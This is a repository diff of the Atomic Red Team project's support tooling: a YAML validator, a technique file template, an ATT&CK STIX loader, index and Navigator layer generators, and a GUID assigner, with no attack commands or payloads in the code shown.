      validate_no_todos!(atomic, path: "atomic_tests[#{i}]")
    end
  end

  #
  # Validates that the arguments (specified in "#{arg}" format) in a string
  # match the input_arguments for a test, in both directions: every referenced
  # arg must be declared, and every declared arg must be referenced.
  #
  def validate_input_args_vs_string!(input_args:, string:, string_description:)
    input_args_in_string = string.scan(/#\{([^}]+)\}/).to_a.flatten

    input_args_in_string_and_not_specced = input_args_in_string - input_args
    if input_args_in_string_and_not_specced.count > 0
      raise("`#{string_description}` contains args #{input_args_in_string_and_not_specced} not in input_arguments")
    end

    input_args_in_spec_not_string = input_args - input_args_in_string
    # fixed: this branch previously re-tested `input_args_in_string_and_not_specced`
    # (making it unreachable) and referenced an undefined `i` in its message
    if input_args_in_spec_not_string.count > 0
      raise("`#{string_description}` input_arguments contains args #{input_args_in_spec_not_string} not used in the command")
    end
  end

  #
  # Recursively validates that the hash (or string/array) doesn't contain a TODO
  #
  def validate_no_todos!(hashish, path:)
    if hashish.is_a? String
      raise "`#{path}` contains a TODO" if hashish.include? 'TODO'
    elsif hashish.is_a? Array
      hashish.each_with_index do |item, i|
        validate_no_todos! item, path: "#{path}[#{i}]"
      end
    elsif hashish.is_a? Hash
      hashish.each do |k, v|
        validate_no_todos! v, path: "#{path}.#{k}"
      end
    end
  end
end
+26
View File
@@ -0,0 +1,26 @@
---
# Starter template for a new atomic technique file. Replace every TODO before
# submitting; the CI validator rejects values containing "TODO".
attack_technique: TODO  # ATT&CK technique identifier, e.g. T1003
display_name: TODO      # ATT&CK technique name
atomic_tests:
- name: TODO
  description: |
    TODO
  # Keep only the platforms this test actually supports.
  supported_platforms:
  - windows
  - macos
  - centos
  - ubuntu
  - linux
  # Arguments referenced from the command as #{arg_name}.
  input_arguments:
    output_file:
      description: TODO
      type: todo  # lowercase/underscored, e.g. path, string, url
      default: TODO
  executor:
    name: command_prompt  # one of command_prompt, sh, bash, powershell, manual
    command: |
      TODO
-150
View File
@@ -1,150 +0,0 @@
import json
import re
from collections import defaultdict
from pathlib import Path
from typing import Pattern
from atomic_red_team.common import base_path
PlatformFilter = str | Pattern[str]
class Attack:
"""Loads MITRE ATT&CK technique metadata used by documentation generation."""
def __init__(self, attack_file: str | Path | None = None):
self.attack_file = (
Path(attack_file)
if attack_file
else Path(base_path) / "atomic_red_team" / "enterprise-attack.json"
)
self._techniques: list[dict] | None = None
self._techniques_by_id: dict[str, dict] | None = None
def ordered_tactics(self) -> list[str]:
return [
"reconnaissance",
"resource-development",
"initial-access",
"execution",
"persistence",
"privilege-escalation",
"stealth",
"defense-impairment",
"credential-access",
"discovery",
"lateral-movement",
"collection",
"command-and-control",
"exfiltration",
"impact",
]
def technique_identifier_for_technique(self, technique: dict) -> str:
reference = next(
ref
for ref in technique.get("external_references", [])
if ref.get("source_name") == "mitre-attack"
)
return reference["external_id"].upper()
def technique_info(self, technique_id: str) -> dict | None:
return self.techniques_by_id.get(technique_id.upper())
def ordered_tactic_to_technique_matrix(
self,
only_platform: PlatformFilter = ".*",
) -> list[list[dict | None]]:
techniques_by_tactic = self.techniques_by_tactic(only_platform=only_platform)
tactic_order = [
techniques_by_tactic[tactic] for tactic in self.ordered_tactics()
]
max_techniques = max(
(len(techniques) for techniques in tactic_order), default=0
)
if max_techniques == 0:
return []
for techniques in tactic_order:
techniques.extend([None] * (max_techniques - len(techniques)))
return [list(row) for row in zip(*tactic_order)]
def techniques_by_tactic(
self,
only_platform: PlatformFilter = ".*",
) -> dict[str, list[dict]]:
result: dict[str, list[dict]] = defaultdict(list)
for technique in self.techniques:
platforms = technique.get("x_mitre_platforms")
if not platforms:
continue
if not any(
_matches_platform(platform, only_platform) for platform in platforms
):
continue
if technique.get("revoked", False) or technique.get(
"x_mitre_deprecated", False
):
continue
for tactic in technique.get("kill_chain_phases", []):
if tactic.get("kill_chain_name") == "mitre-attack":
result[tactic["phase_name"]].append(technique)
return result
@property
def techniques(self) -> list[dict]:
if self._techniques is None:
raw = [
obj
for obj in json.loads(self.attack_file.read_text())["objects"]
if obj.get("type") == "attack-pattern"
]
id_to_name = {
_attack_id(obj): obj["name"]
for obj in raw
if _attack_id(obj) is not None
}
techniques = []
for obj in raw:
tid = _attack_id(obj)
if tid is None:
continue
t = dict(obj)
if "." in tid:
parent_name = id_to_name.get(tid.split(".")[0])
if parent_name:
t["name"] = f"{parent_name}: {t['name']}"
techniques.append(t)
self._techniques = techniques
return self._techniques
@property
def techniques_by_id(self) -> dict[str, dict]:
if self._techniques_by_id is None:
self._techniques_by_id = {
tid: t
for t in self.techniques
if (tid := _attack_id(t)) is not None
}
return self._techniques_by_id
def _attack_id(technique: dict) -> str | None:
"""Return the ATT&CK ID (e.g. 'T1059.001') for a technique dict, or None."""
for ref in technique.get("external_references", []):
if ref.get("source_name") == "mitre-attack":
return ref["external_id"].upper()
return None
def _matches_platform(platform: str, only_platform: PlatformFilter) -> bool:
# Normalize STIX platform names ("Azure AD" -> "azure-ad", "IaaS" -> "iaas") so
# they match the hyphenated YAML platform strings used as filters.
normalized = platform.lower().replace(" ", "-")
if isinstance(only_platform, str):
# Also match in the other direction so "iaas" matches filter "iaas:gcp".
return (
re.search(only_platform, normalized) is not None
or re.search(re.escape(normalized), only_platform) is not None
)
return only_platform.search(normalized) is not None
+113
View File
@@ -0,0 +1,113 @@
require 'open-uri'
require 'json'
#
# Attack is an API class that loads information about ATT&CK techniques from MITRE'S ATT&CK
# STIX representation. It makes it very simple to do common things with ATT&CK.
#
class Attack
  #
  # Tactics as presented in the order that the ATT&CK matrix uses
  #
  def ordered_tactics
    [
      'initial-access',
      'execution',
      'persistence',
      'privilege-escalation',
      'defense-evasion',
      'credential-access',
      'discovery',
      'lateral-movement',
      'collection',
      'exfiltration',
      'command-and-control',
    ]
  end

  #
  # Returns the technique identifier (T1234) for a Technique object.
  # Raises NoMethodError (on nil) if the technique has no mitre-attack reference.
  #
  def technique_identifier_for_technique(technique)
    technique.fetch('external_references', []).find do |refs|
      refs['source_name'] == 'mitre-attack'
    end['external_id'].upcase
  end

  #
  # Returns a Technique object given a technique identifier (T1234), or nil when unknown
  #
  def technique_info(technique_id)
    techniques.find do |item|
      item.fetch('external_references', []).find do |references|
        references['external_id'] == technique_id.upcase
      end
    end
  end

  #
  # Returns the ATT&CK Matrix as a 2D array (rows of techniques), with columns
  # in `ordered_tactics` order; shorter columns are padded with nil
  #
  def ordered_tactic_to_technique_matrix(only_platform: /.*/)
    all_techniques = techniques_by_tactic(only_platform: only_platform)

    # make a 2d array of our techniques in the order our tactics appear
    all_techniques_in_tactic_order = []
    ordered_tactics.each do |tactic|
      all_techniques_in_tactic_order << all_techniques[tactic]
    end

    # figure out the max number of techniques any one tactic has
    max_techniques = all_techniques_in_tactic_order.collect(&:count).max

    # extend each array of techniques to that length
    all_techniques_in_tactic_order.each {|techniques| techniques.concat(Array.new(max_techniques - techniques.count, nil))}

    # transpose to give us the data in columnar format
    all_techniques_in_tactic_order.transpose
  end

  #
  # Returns a map of all [ ATT&CK Tactic name ] => [ List of ATT&CK techniques associated with that tactic]
  #
  def techniques_by_tactic(only_platform: /.*/)
    techniques_by_tactic = Hash.new {|h, k| h[k] = []}
    techniques.each do |technique|
      # skip techniques that don't apply to the requested platform filter
      next unless technique['x_mitre_platforms'].any? {|platform| platform.downcase =~ only_platform}

      technique.fetch('kill_chain_phases', []).select {|phase| phase['kill_chain_name'] == 'mitre-attack'}.each do |tactic|
        techniques_by_tactic[tactic.fetch('phase_name')] << technique
      end
    end
    techniques_by_tactic
  end

  #
  # Returns a list of all ATT&CK techniques (attack-pattern objects that carry
  # a mitre-attack external reference)
  #
  def techniques
    # pull out the attack pattern objects
    # fixed: this previously chained `select` inside the condition; `select`
    # returns an Array, which is always truthy in Ruby (even when empty), so the
    # mitre-attack reference check never filtered anything. `any?` applies the
    # intended filter and protects technique_identifier_for_technique from nil.
    attack_stix.fetch("objects").select do |item|
      item.fetch('type') == 'attack-pattern' && item.fetch('external_references', []).any? do |references|
        references['source_name'] == 'mitre-attack'
      end
    end
  end

  private

  #
  # Returns the complete ATT&CK STIX collection parsed into a Hash, preferring a
  # local enterprise-attack.json and falling back to the copy hosted on GitHub
  #
  def attack_stix
    @attack_stix ||= begin
      # load the full attack library
      local_attack_json_to_try = "#{File.dirname(__FILE__)}/enterprise-attack.json"
      if File.exist? local_attack_json_to_try
        JSON.parse File.read(local_attack_json_to_try)
      else
        # Kernel#open accepts URLs because open-uri is required at the top of
        # this file (NOTE: removed in Ruby 3 — migrate to URI.open there)
        JSON.parse open('https://raw.githubusercontent.com/mitre/cti/master/enterprise-attack/enterprise-attack.json').read
      end
    end
  end
end
-5
View File
@@ -1,5 +0,0 @@
from os.path import dirname, realpath

# Absolute path to the repository root (two directory levels above this module).
base_path = dirname(dirname(realpath(__file__)))
# Directory holding the per-technique folders (atomics/T*/T*.yaml).
atomics_path = f"{base_path}/atomics"
# NOTE(review): presumably a registry of GUIDs already assigned to atomic
# tests, used to avoid collisions — confirm against the generator that reads it.
used_guids_file = f"{atomics_path}/used_guids.txt"
-580
View File
@@ -1,580 +0,0 @@
import csv
import json
import re
from concurrent.futures import ThreadPoolExecutor, as_completed
from functools import lru_cache
from io import StringIO
from pathlib import Path
from typing import Pattern, get_args
import yaml
from jinja2 import Environment, FileSystemLoader
from atomic_red_team.attack_api import Attack, PlatformFilter, _matches_platform
from atomic_red_team.common import atomics_path, base_path
from atomic_red_team.models import Platform, get_language, get_supported_platform
PLATFORMS: list[str] = list(get_args(Platform))
class AtomicRedTeam:
    """Loads Atomic Red Team YAML documents and renders technique links."""

    def __init__(
        self, atomics_dir: str | Path = atomics_path, attack_api: Attack | None = None
    ):
        self.atomics_dir = Path(atomics_dir)
        # Reuse the caller's Attack instance when supplied; otherwise build one.
        self.attack_api = attack_api if attack_api else Attack()
        # Caches filled lazily by `atomic_tests` / `atomic_tests_for_technique`.
        self._atomic_tests: list[dict] | None = None
        self._tests_by_id: dict[str, list[dict]] | None = None

    @property
    def atomic_test_paths(self) -> list[Path]:
        """Sorted paths of every technique YAML file (atomics/T*/T*.yaml)."""
        return sorted(self.atomics_dir.glob("T*/T*.yaml"))

    @property
    def atomic_tests(self) -> list[dict]:
        """Every technique document, parsed once and cached; each document is
        tagged with its source path under the "atomic_yaml_path" key."""
        if self._atomic_tests is None:
            loaded = []
            for source in self.atomic_test_paths:
                document = yaml.load(source.read_text(), Loader=yaml.CSafeLoader)
                document["atomic_yaml_path"] = str(source)
                loaded.append(document)
            self._atomic_tests = loaded
        return self._atomic_tests

    def atomic_tests_for_technique(
        self, technique_or_identifier: dict | str
    ) -> list[dict]:
        """Return the atomic tests for a technique (dict or "T1234" string);
        [] when the technique has no tests."""
        if self._tests_by_id is None:
            lookup: dict[str, list[dict]] = {}
            for document in self.atomic_tests:
                lookup[document["attack_technique"].upper()] = document.get(
                    "atomic_tests", []
                )
            self._tests_by_id = lookup
        wanted = self._technique_identifier(technique_or_identifier).upper()
        return self._tests_by_id.get(wanted, [])

    def atomic_tests_for_technique_by_platform(
        self,
        technique_or_identifier: dict | str,
        platform: str,
    ) -> list[dict]:
        """Tests for the technique restricted to one supported platform."""
        matching = []
        for test in self.atomic_tests_for_technique(technique_or_identifier):
            if platform in test.get("supported_platforms", []):
                matching.append(test)
        return matching

    def github_link_to_technique(
        self,
        technique: dict,
        include_identifier: bool = False,
        only_platform: PlatformFilter = ".*",
    ) -> str:
        """Markdown link to a technique's doc page, or a CONTRIBUTE prompt when
        no rendered doc / platform-matching test exists."""
        technique_identifier = self.attack_api.technique_identifier_for_technique(
            technique
        ).upper()
        if include_identifier:
            link_display = f"{technique_identifier} {technique['name']}"
        else:
            link_display = technique["name"]
        technique_dir = self.atomics_dir / technique_identifier
        yaml_file = technique_dir / f"{technique_identifier}.yaml"
        markdown_file = technique_dir / f"{technique_identifier}.md"
        has_docs = (
            self.atomic_yaml_has_test_for_platform(yaml_file, only_platform)
            and markdown_file.exists()
        )
        if has_docs:
            return f"[{link_display}](../../{technique_identifier}/{technique_identifier}.md)"
        return f"{link_display} [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)"

    def atomic_yaml_has_test_for_platform(
        self,
        yaml_file: Path,
        only_platform: PlatformFilter,
    ) -> bool:
        """True when `yaml_file` exists and at least one of its tests supports
        a platform matching `only_platform`."""
        if not yaml_file.exists():
            return False
        document = yaml.load(yaml_file.read_text(), Loader=yaml.CSafeLoader)
        for atomic in document.get("atomic_tests", []):
            for platform in atomic.get("supported_platforms", []):
                if _matches_platform(platform, only_platform):
                    return True
        return False

    def _technique_identifier(self, technique_or_identifier: dict | str) -> str:
        """Accept either a STIX technique dict or a bare "T1234" string."""
        return (
            self.attack_api.technique_identifier_for_technique(
                technique_or_identifier
            )
            if isinstance(technique_or_identifier, dict)
            else technique_or_identifier
        )
class AtomicRedTeamDocs:
"""Generates Atomic Red Team markdown, CSV, YAML, and Navigator indexes."""
def __init__(
self,
base_dir: str | Path = base_path,
attack_file: str | Path | None = None,
atomic_red_team: AtomicRedTeam | None = None,
):
self.base_dir = Path(base_dir)
self.attack_api = Attack(attack_file)
self.atomic_red_team = atomic_red_team or AtomicRedTeam(
self.base_dir / "atomics",
self.attack_api,
)
    def generate_all_the_docs(self) -> tuple[list[str], list[str]]:
        """Render per-technique markdown for every atomic YAML file, then
        regenerate all indexes.

        Returns (oks, fails): source YAML paths that rendered successfully and
        those that raised. Rendering is fanned out to a thread pool; a failed
        technique is reported but does not stop the run.
        """
        # Pre-warm all caches on the main thread before handing off to workers.
        # atomic_tests loads all YAML; _tests_by_id builds the lookup dict;
        # techniques_by_id is used by generate_technique_docs per technique.
        _ = self.atomic_red_team.atomic_tests
        _ = self.attack_api.techniques_by_id

        def _render_one(atomic_yaml: dict) -> tuple[str, str, str]:
            # Render one technique next to its YAML (T1234.yaml -> T1234.md).
            # Returns ("ok"|"fail", source path, output path or error text) so
            # the result can be reported without re-raising across threads.
            output_path = Path(atomic_yaml["atomic_yaml_path"]).with_suffix(".md")
            try:
                self.generate_technique_docs(atomic_yaml, output_path)
                return ("ok", atomic_yaml["atomic_yaml_path"], str(output_path))
            except Exception as ex:
                return ("fail", atomic_yaml["atomic_yaml_path"], str(ex))

        oks: list[str] = []
        fails: list[str] = []
        with ThreadPoolExecutor() as executor:
            futures = [
                executor.submit(_render_one, ay)
                for ay in self.atomic_red_team.atomic_tests
            ]
            # as_completed yields in completion order, so progress output may be
            # interleaved differently from the input ordering.
            for future in as_completed(futures):
                status, src_path, detail = future.result()
                if status == "ok":
                    print(f"Generating docs for {src_path} => {detail} => OK")
                    oks.append(src_path)
                else:
                    print(f"Generating docs for {src_path} FAIL\n{detail}")
                    fails.append(src_path)
        print()
        print(f"Generated docs for {len(oks)} techniques, {len(fails)} failures")
        self.generate_indexes()
        return oks, fails
def generate_technique_docs(
self, atomic_yaml: dict, output_doc_path: str | Path
) -> None:
technique = self.attack_api.technique_info(atomic_yaml["attack_technique"])
if technique is None:
raise ValueError(
f"Unknown ATT&CK technique {atomic_yaml['attack_technique']}"
)
technique = {**technique, "identifier": atomic_yaml["attack_technique"].upper()}
output_doc_path = Path(output_doc_path)
output_doc_path.write_text(_render_technique_markdown(technique, atomic_yaml))
    def generate_indexes(self) -> None:
        """Regenerate every index artifact under atomics/Indexes: markdown
        matrices and indexes (overall and per-platform), CSV indexes, YAML
        indexes, and ATT&CK Navigator layers."""
        index_dir = self.base_dir / "atomics" / "Indexes"
        for subdir in (
            "Matrices",
            "Indexes-Markdown",
            "Indexes-CSV",
            "Attack-Navigator-Layers",
        ):
            (index_dir / subdir).mkdir(parents=True, exist_ok=True)
        self.generate_attack_matrix("All", index_dir / "Matrices" / "matrix.md")
        for title, platform, filename in _platform_outputs("matrix.md"):
            self.generate_attack_matrix(
                title, index_dir / "Matrices" / filename, platform
            )
        self.generate_index("All", index_dir / "Indexes-Markdown" / "index.md")
        for title, platform, filename in _platform_outputs("index.md"):
            # Use ".*" for attack_platform so STIX v19 platform renames don't break
            # cloud-platform indexes; rely on YAML supported_platforms for filtering.
            self.generate_index(
                title, index_dir / "Indexes-Markdown" / filename, platform
            )
        self.generate_index_csv(index_dir / "Indexes-CSV" / "index.csv")
        for title, platform, filename in _platform_outputs("index.csv"):
            self.generate_index_csv(index_dir / "Indexes-CSV" / filename, platform)
        self.generate_yaml_index(index_dir / "index.yaml")
        for platform in PLATFORMS:
            # Platform strings like "iaas:aws" contain ':' which is awkward in
            # filenames, so it is replaced with '_'.
            self.generate_yaml_index_by_platform(
                index_dir / f"{platform.replace(':', '_')}-index.yaml",
                platform,
            )
        self.generate_navigator_layers(index_dir / "Attack-Navigator-Layers")
def generate_attack_matrix(
    self,
    title_prefix: str,
    output_doc_path: str | Path,
    only_platform: PlatformFilter = ".*",
) -> None:
    """Write a markdown table of techniques arranged by ATT&CK tactic.

    Args:
        title_prefix: e.g. "All" or a platform display name, used in the H1.
        output_doc_path: destination markdown file.
        only_platform: regex-like platform filter; ".*" means all platforms.
    """
    rows = [f"# {title_prefix} Atomic Tests by ATT&CK Tactic & Technique\n"]
    tactics = self.attack_api.ordered_tactics()
    # Markdown table header row followed by the |-----| separator row.
    rows.append(f"| {' | '.join(tactics)} |\n")
    rows.append(f"|{'-----|' * len(tactics)}\n")
    for row_of_techniques in self.attack_api.ordered_tactic_to_technique_matrix(
        only_platform
    ):
        # Empty cells pad columns whose tactic has fewer techniques.
        row = [
            self.atomic_red_team.github_link_to_technique(
                technique, only_platform=only_platform
            )
            if technique
            else ""
            for technique in row_of_techniques
        ]
        rows.append(f"| {' | '.join(row)} |\n")
    Path(output_doc_path).write_text("".join(rows))
def generate_index(
    self,
    title_prefix: str,
    output_doc_path: str | Path,
    only_platform: PlatformFilter = ".*",
    attack_platform: PlatformFilter = ".*",
) -> None:
    """Write a markdown index of techniques and their tests, grouped by tactic.

    Args:
        title_prefix: heading prefix (e.g. "All", "Windows").
        output_doc_path: destination markdown file.
        only_platform: filters tests by their YAML supported_platforms.
        attack_platform: filters techniques by ATT&CK's own platform tags.
    """
    rows = [f"# {title_prefix} Atomic Tests by ATT&CK Tactic & Technique\n"]
    by_tactic = self.attack_api.techniques_by_tactic(attack_platform)
    for tactic in self.attack_api.ordered_tactics():
        # Numeric ordering: T1001 < T1001.001 < T1002.
        techniques = sorted(
            by_tactic.get(tactic, []),
            key=lambda t: _technique_sort_key(
                self.attack_api.technique_identifier_for_technique(t)
            ),
        )
        if not techniques:
            continue
        # For platform-specific indexes exclude techniques with no tests on that platform.
        if only_platform != ".*":
            techniques = [
                t for t in techniques
                if any(
                    _matches_platform(platform, only_platform)
                    for test in self.atomic_red_team.atomic_tests_for_technique(t)
                    for platform in test.get("supported_platforms", [])
                )
            ]
            if not techniques:
                continue
        rows.append(f"# {tactic}\n")
        for technique in techniques:
            rows.append(
                f"- {self.atomic_red_team.github_link_to_technique(technique, True, only_platform)}\n"
            )
            tests = self.atomic_red_team.atomic_tests_for_technique(technique)
            # Test numbering is 1-based and counts ALL tests, so numbers stay
            # stable even when a platform filter hides some of them.
            for index, atomic_test in enumerate(tests, start=1):
                platforms = atomic_test.get("supported_platforms", [])
                if any(
                    _matches_platform(platform, only_platform)
                    for platform in platforms
                ):
                    rows.append(
                        f"  - Atomic Test #{index}: {atomic_test['name']} [{', '.join(platforms)}]\n"
                    )
        rows.append("\n")
    Path(output_doc_path).write_text("".join(rows))
def generate_index_csv(
    self,
    output_doc_path: str | Path,
    only_platform: PlatformFilter = ".*",
    attack_platform: PlatformFilter = ".*",
) -> None:
    """Write a CSV index: one row per (tactic, technique, atomic test).

    Args:
        output_doc_path: destination CSV file.
        only_platform: filters tests by their YAML supported_platforms.
        attack_platform: filters techniques by ATT&CK's own platform tags.
    """
    output = StringIO()
    writer = csv.writer(output, lineterminator="\n")
    writer.writerow(
        [
            "Tactic",
            "Technique #",
            "Technique Name",
            "Test #",
            "Test Name",
            "Test GUID",
            "Executor Name",
        ]
    )
    by_tactic = self.attack_api.techniques_by_tactic(attack_platform)
    for tactic in self.attack_api.ordered_tactics():
        techniques = sorted(
            by_tactic.get(tactic, []),
            key=lambda t: _technique_sort_key(
                self.attack_api.technique_identifier_for_technique(t)
            ),
        )
        for technique in techniques:
            tests = self.atomic_red_team.atomic_tests_for_technique(technique)
            # index is 1-based over ALL tests so numbering matches the
            # markdown index regardless of platform filtering.
            for index, atomic_test in enumerate(tests, start=1):
                if any(
                    _matches_platform(platform, only_platform)
                    for platform in atomic_test.get("supported_platforms", [])
                ):
                    writer.writerow(
                        [
                            tactic,
                            technique["external_references"][0]["external_id"],
                            technique["name"],
                            index,
                            atomic_test["name"],
                            atomic_test.get("auto_generated_guid", ""),
                            atomic_test["executor"]["name"],
                        ]
                    )
    Path(output_doc_path).write_text(output.getvalue())
def generate_yaml_index(self, output_doc_path: str | Path) -> None:
    """Write the full YAML index of all tactics, techniques, and tests."""
    index = self._yaml_index()
    # Round-trip through JSON so every value is a plain dict/list/scalar
    # that the C-backed safe dumper can serialize.
    plain = json.loads(json.dumps(index))
    text = yaml.dump(
        plain,
        Dumper=yaml.CSafeDumper,
        sort_keys=False,
        allow_unicode=True,
    )
    Path(output_doc_path).write_text(text)
def generate_yaml_index_by_platform(
    self, output_doc_path: str | Path, platform: str
) -> None:
    """Write a YAML index restricted to tests supporting one platform."""
    index = self._yaml_index(platform)
    # JSON round-trip coerces everything to plain types for the safe dumper.
    plain = json.loads(json.dumps(index))
    text = yaml.dump(
        plain,
        Dumper=yaml.CSafeDumper,
        sort_keys=False,
        allow_unicode=True,
    )
    Path(output_doc_path).write_text(text)
def generate_navigator_layers(self, output_dir: str | Path) -> None:
    """Write ATT&CK Navigator layer JSON files: one global, one per platform."""
    output_dir = Path(output_dir)
    # (filename, platform) pairs; platform=None means the unfiltered layer.
    layer_specs = [("art-navigator-layer.json", None)]
    layer_specs.extend(
        (f"art-navigator-layer-{platform.replace(':', '-')}.json", platform)
        for platform in PLATFORMS
    )
    for filename, platform in layer_specs:
        layer = _navigator_layer(
            techniques=self._navigator_techniques(platform),
            layer_name=_layer_name(filename),
            platform=platform,
        )
        # Compact separators keep the committed JSON small.
        (output_dir / filename).write_text(
            json.dumps(layer, separators=(",", ":")), encoding="utf-8"
        )
def _yaml_index(self, platform: str | None = None) -> dict:
    """Build the nested index {tactic: {technique_id: {technique, atomic_tests}}}.

    Args:
        platform: when given, only tests supporting that platform are included
            (techniques with zero matching tests still appear with an empty list).
    """
    result = {}
    for tactic, techniques in self.attack_api.techniques_by_tactic().items():
        result[tactic] = {}
        for technique in techniques:
            identifier = technique["external_references"][0]["external_id"]
            tests = self.atomic_red_team.atomic_tests_for_technique(technique)
            if platform:
                tests = [
                    test
                    for test in tests
                    if platform in test.get("supported_platforms", [])
                ]
            result[tactic][identifier] = {
                "technique": technique,
                "atomic_tests": tests,
            }
    return result
def _navigator_techniques(self, platform: str | None = None) -> list[dict]:
    """Build Navigator technique entries; score = number of matching tests.

    Sub-technique scores (e.g. T1003.001) are also rolled up into their parent
    technique's entry (T1003), creating the parent if it has no tests itself.
    """
    entries: dict[str, dict] = {}
    parent_scores: dict[str, int] = {}
    for atomic_yaml in self.atomic_red_team.atomic_tests:
        tests = atomic_yaml.get("atomic_tests", [])
        if platform:
            tests = [
                test
                for test in tests
                if platform in test.get("supported_platforms", [])
            ]
        if not tests:
            continue
        technique_id = atomic_yaml["attack_technique"]
        entry: dict = {
            "techniqueID": technique_id,
            "score": len(tests),
            "enabled": True,
        }
        if platform is not None:
            # Platform layers list the matching test names in the tooltip comment.
            entry["comment"] = "\n" + "".join(
                f"- {t['name']}\n" for t in tests
            )
        entry["links"] = [{"label": "View Atomic", "url": _atomic_url(technique_id)}]
        entries[technique_id] = entry
        # A dotted ID marks a sub-technique; accumulate toward the parent.
        if "." in technique_id:
            parent_id = technique_id.split(".")[0]
            parent_scores[parent_id] = parent_scores.get(parent_id, 0) + len(tests)
    for parent_id, score in parent_scores.items():
        if parent_id in entries:
            entries[parent_id]["score"] += score
        else:
            # Parent has no tests of its own: synthesize an entry for the rollup.
            entries[parent_id] = {
                "techniqueID": parent_id,
                "score": score,
                "enabled": True,
                "links": [{"label": "View Atomic", "url": _atomic_url(parent_id)}],
            }
    return list(entries.values())
@lru_cache(maxsize=None)
def _get_template():
    """Return the (cached) Jinja2 template used to render technique markdown.

    autoescape is off because the output is markdown, not HTML; the template
    file lives next to this module.
    """
    environment = Environment(
        autoescape=False,
        keep_trailing_newline=True,
        loader=FileSystemLoader(Path(__file__).parent),
    )
    # Custom filters available inside atomic_doc_template.md.j2.
    environment.filters.update(
        {
            "anchor": _anchor,
            "attack_url_identifier": lambda value: str(value).replace(".", "/"),
            "cleanup": _cleanup,
            "language": get_language,
            "platform_list": _platform_list,
        }
    )
    return environment.get_template("atomic_doc_template.md.j2")
def _render_technique_markdown(technique: dict, atomic_yaml: dict) -> str:
    """Render one technique's markdown from the shared Jinja2 template.

    The YAML's display_name (when present) overrides the ATT&CK technique name.
    """
    template = _get_template()
    technique = {
        **technique,
        "name": atomic_yaml.get("display_name", technique["name"]),
    }
    return template.render(
        atomic_yaml=atomic_yaml,
        attack_description_lines=_attack_description_lines(technique),
        technique=technique,
    )
def _attack_description_lines(technique: dict) -> list[str]:
description = technique.get("description", "").replace("%\\<", "%<")
description = re.sub(
r"<code>.*?</code>",
lambda match: match.group(0).replace("~", r"\~"),
description,
)
return description.splitlines()
def _platform_list(platforms: list[str]) -> str:
    """Join platform identifiers into a readable comma-separated list."""
    titles = [get_supported_platform(identifier) for identifier in platforms]
    return ", ".join(titles)
def _cleanup(value: object) -> str:
return str(value or "").strip().replace("\\", "&#92;")
def _anchor(title: str) -> str:
return re.sub(
r"[`~!@#$%^&*()+=<>?,./:;\"'|{}\[\]\\–—]", "", title.lower().replace(" ", "-")
)
# Platform identifier -> human-readable title used in index/matrix headings.
_PLATFORM_TITLES: dict[str, str] = {
    "windows": "Windows",
    "macos": "macOS",
    "linux": "Linux",
    "office-365": "Office 365",
    "azure-ad": "Azure AD",
    "google-workspace": "Google Workspace",
    "saas": "SaaS",
    "iaas": "IaaS",
    "containers": "Containers",
    "iaas:gcp": "IaaS:GCP",
    "iaas:azure": "IaaS:Azure",
    "iaas:aws": "IaaS:AWS",
    "esxi": "ESXi",
}
# Platforms whose filename prefix differs from their identifier (e.g. colon is invalid).
_PLATFORM_FILENAME_PREFIX: dict[str, str] = {
    "iaas:gcp": "gcp",
    "iaas:azure": "azure",
    "iaas:aws": "aws",
}
def _platform_outputs(suffix: str) -> list[tuple[str, str, str]]:
    """Return (title, platform id, filename) triples for per-platform outputs."""
    outputs = []
    for platform in PLATFORMS:
        title = _PLATFORM_TITLES.get(platform, platform)
        prefix = _PLATFORM_FILENAME_PREFIX.get(platform, platform)
        outputs.append((title, platform, f"{prefix}-{suffix}"))
    return outputs
def _atomic_url(technique_id: str) -> str:
return f"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/{technique_id}/{technique_id}.md"
def _navigator_layer(
techniques: list[dict], layer_name: str, platform: str | None = None
) -> dict:
filters: dict = {}
if platform in ("windows", "macos", "linux"):
filters = {
"platforms": [
platform.replace("macos", "macOS")
.replace("windows", "Windows")
.replace("linux", "Linux")
]
}
return {
"name": layer_name,
"versions": {"attack": "19", "navigator": "5.3.0", "layer": "4.5"},
"description": f"{layer_name} MITRE ATT&CK Navigator Layer",
"domain": "enterprise-attack",
"filters": filters,
"gradient": {"colors": ["#ffffff", "#ce232e"], "minValue": 0, "maxValue": 10},
"legendItems": [
{"label": "10 or more tests", "color": "#ce232e"},
{"label": "1 or more tests", "color": "#ffffff"},
],
"techniques": techniques,
}
def _technique_sort_key(technique_id: str) -> tuple[int, ...]:
"""Return a sort key that orders T1001 < T1001.001 < T1001.002 < T1002."""
parts = technique_id.lstrip("Tt").split(".")
return tuple(int(p) for p in parts)
def _layer_name(filename: str) -> str:
if filename == "art-navigator-layer.json":
return "Atomic Red Team"
platform = filename.removeprefix("art-navigator-layer-").removesuffix(".json")
names = {
"windows": "Windows",
"macos": "macOS",
"linux": "Linux",
"iaas": "Iaas",
"iaas-aws": "Iaas:AWS",
"iaas-azure": "Iaas:Azure",
"iaas-gcp": "Iaas:GCP",
"containers": "Containers",
"saas": "SaaS",
"google-workspace": "Google-Workspace",
"azure-ad": "Azure-AD",
"office-365": "Office-365",
"esxi": "ESXi",
}
return f"Atomic Red Team ({names.get(platform, platform)})"
File diff suppressed because one or more lines are too long
-45
View File
@@ -1,45 +0,0 @@
import re
import uuid
from typing import List
from ruamel.yaml import YAML
from atomic_red_team.common import used_guids_file
yaml = YAML(typ="safe")
def get_unique_guid(guids: List[str]):
    # This function should return a unique GUID that's not in the used_guids_file.
    # NOTE(review): the membership test below only works if `guids` entries have
    # no trailing newlines — confirm the caller strips them before passing.
    # The recursion retries on (astronomically unlikely) uuid4 collisions.
    guid = str(uuid.uuid4())
    if guid not in guids:
        # Record the new GUID immediately so later calls in the same run see it
        # via the file (the in-memory `guids` list is NOT updated here).
        with open(used_guids_file, "a") as f:  # append mode
            f.write(f"{guid}\n")
        return guid
    else:
        return get_unique_guid(guids)
def generate_guids_for_yaml(path, get_guid):
    """Insert missing auto_generated_guid entries into a technique YAML file.

    Operates on raw text (not parsed YAML) so existing formatting is preserved.
    `get_guid` is a zero-argument callable returning a fresh unique GUID string.
    """
    with open(path, "r") as file:
        og_text = file.read()
    # Add the "auto_generated_guid:" element after the "- name:" element if it isn't already there
    text = re.sub(
        r"(?i)(^([ \t]*-[ \t]*)name:.*$(?!\s*auto_generated_guid))",
        # Reuse the "- " prefix's indentation, swapping the dash for a space.
